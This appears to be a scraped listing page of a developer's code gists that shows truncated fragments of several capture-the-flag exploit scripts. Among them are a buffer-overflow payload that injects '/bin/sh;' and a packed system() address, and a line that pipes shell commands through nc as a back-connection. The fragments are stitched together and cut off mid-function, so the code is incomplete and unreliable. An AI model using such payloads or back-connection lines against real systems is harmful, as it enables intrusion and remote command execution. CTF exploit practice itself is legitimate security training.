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from Pwning import *
# customs when binary doesn't have nx eable or mprotect/nmap is on got table
# from Shellcode import *
# edit Templet with your own Name
class CGC(Payload):
def __init__(self):
peternguyen93 /
Created July 27, 2015 13:29
white hat contest 10 pwn300
from Pwn import *
# from Shellcode import *
p = Pwn(mode=1,host='',port=10300)
def exploit():
payload = '<su>' + 'A'*127 + '<to>' + '/bin/sh;' + 'C'*120
payload+= p.pack(0x400A40)[:3] # system
from Pwn import *
p = Pwn(host='',port=2555)
# p = Pwn()
def create_contact(name,description):
from Pwn import *
# p = Pwn(mode=1,port=12012)
p = Pwn(mode=1,host='',port=12012)
username = 'blankwall'
password = ';rpywx~YYYBBBBB~:::::::=KP`'
from Pwn import *
import re
def add_skeleton(skeleton):
d = p.read_until('\x1b[0;31;49m[q]\x1b[0muit')
p.read_until('so... what do you say to mr skeletal?\n')
from Pwn import *
p = Pwn(host='',port=24242)
# p = Pwn(port=24242)
def exploit():
shell = raw_input('> ')
back_connect = shell + ' | nc 8001'
import socket
import re
from capstone import *
from Pwn import *
import sys
# p = Pwn(mode=1,host='',port=12351)
def disas(code):
asm = ''
from Pwn import *
p = Pwn(mode=1,host='',port=4001)
def add_node(nid,content):
p.read_until('Please choose an option :')
p.read_until('Please give me an id:')
from Pwn import *
import string
p = Pwn(mode=1,host='',port=4003)
def find_index_flag():
p.read_until('Remember: send us your hex-encoded flag.\r\n')
last = 0xff # -2
__author__ = 'yeuchimse'
import struct
FileMode = ['rb', 'wb', 'ab', 'r+b', 'w+b', 'a+b']
Registers = ['eax', 'ebx', 'ecx', 'edx', 'esi', 'edi', 'esp', 'ebp']
# region ...
def format_code(v):